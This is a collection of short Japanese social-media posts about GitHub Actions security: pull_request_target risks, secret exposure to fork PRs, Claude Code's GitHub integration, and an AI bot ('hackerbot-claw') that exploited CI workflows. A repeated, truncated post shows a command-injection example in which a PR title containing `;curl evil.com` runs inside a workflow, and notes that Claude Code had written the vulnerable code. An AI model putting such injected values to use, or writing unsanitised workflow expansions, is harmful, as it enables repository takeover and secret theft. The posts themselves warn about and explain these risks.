GitHub Actions、pull_request_targetでなくpull_requestを使っていればforkリポジトリからのPRはシークレットにアクセスできないしGITHUB_TOKENはread権限になる DependabotはforkリポジトリからのPRとして扱われる

Claude Code GitHub Actionsの起動に関する機能には以下の2つがある。 - @ Claude Code 　⇒GitHub上のIssueやPull Request等のコメント欄で、ユーザが@ claudeとメンションすることにより、Claude Codeを起動し、タスクを実行する機能。

Claude Code GitHub Actionsを利用するには、/install-github-appコマンドを実行する。 Claude Code GitHub Actionsでは、明示的にPull Requestを指示しない限り、Pull Requestが作られることはない。

#GitHub GitHub Actionsでpull_request_targetトリガーで、コードのチェックアウトするのはセキュリティリスク有り。 リポジトリシークレットにアクセスできる状態で、任意のコードを実行できてしまうことがある。

GitHub Actionsのactionのcommit hashだけ悪意のあるものに差し替えられたPull Request出てきたとして、果たしてレビューで止められるだろうか

リモートリポジトリをたてるのはGitHub以外でも可能で自社のプログラムを安全に管理したい団体はGitLabやGiteaをセルフホストしてたりする この辺を勉強するときはgitの機能(add, commit, push, etc...)とGitHubの機能(pull request, github actions, etc...)の区別をつけた状態で勉強するといいよ

Nuxt5のDraft PRもできてた。 v5.0.0 by github-actions[bot] · Pull Request #34497 · nuxt/nuxt github.com/nuxt/nuxt/pull…

ということで shfmt を dotfiles の CI に導入！ feat: add shfmt step to GitHub Actions workflow for code formatting by shunk031 · Pull Request #314 · shunk031/dotfiles github.com/shunk031/dotfi…

「自分のリポジトリは大丈夫かな」と思って監査したら、本当に脆弱性が見つかりました🔍 しかも犯人は Claude Code でした。 GitHub Actions の `run:` ブロック内で `${{ github.event.pull_request.title }}` を直接展開すると、PR タイトルに `;curl evil.com`

「自分のリポジトリは大丈夫かな」と思って監査したら、本当に脆弱性が見つかりました🔍 しかも犯人は Claude Code でした。 GitHub Actions の `run:` ブロック内で `${{ github.event.pull_request.title }}` を直接展開すると、PR タイトルに `;curl evil.com`

Microsoft／DataDog 標的の CI/CD 攻撃キャンペーン：Hackerbot-claw が GitHub Actions を悪用 iototsecnews.jp/2026/03/03/hac… この攻撃の背景にあるのは、GitHub Actions における pull_request_target ワークフローの設定不備です。

[PR]📚今日の1冊📕2 タイトル：【POD】Google CloudとGitHub ActionsでPull Request連動環境を作る本 価格：2,200円 #github #木村俊彦 #インプレスR&D #入門書 #技術書 #楽天Kobo #楽天Books hb.afl.rakuten.co.jp/hgc/g00q0726.r…

へぇ 「Claude Code Action は、GitHub Actions のワークフロー上で Claude を実行し、Issue や Pull Request を起点に開発タスクを自動化できる仕組み」 zenn.dev/chot/articles/…

GitHub Actionsの権限にpull_request_targetなどの強い権限を使わないのが対策として大事 #jawsug #jawsdays2026 #jawsdays2026_a pic.x.com/2sXnWulIoC

zenn.dev/aeyesec/articl… AIボット「hackerbot-claw」がGitHub Actionsの脆弱性を悪用した自動攻撃を解説。 コマンドインジェクションや不正なコード実行によるリポジトリ乗っ取りの実証と仕組みを紹介。 対策としてデータと命令の分離、pull_request_targetの安全な運用、AIへの権限最小化が重要。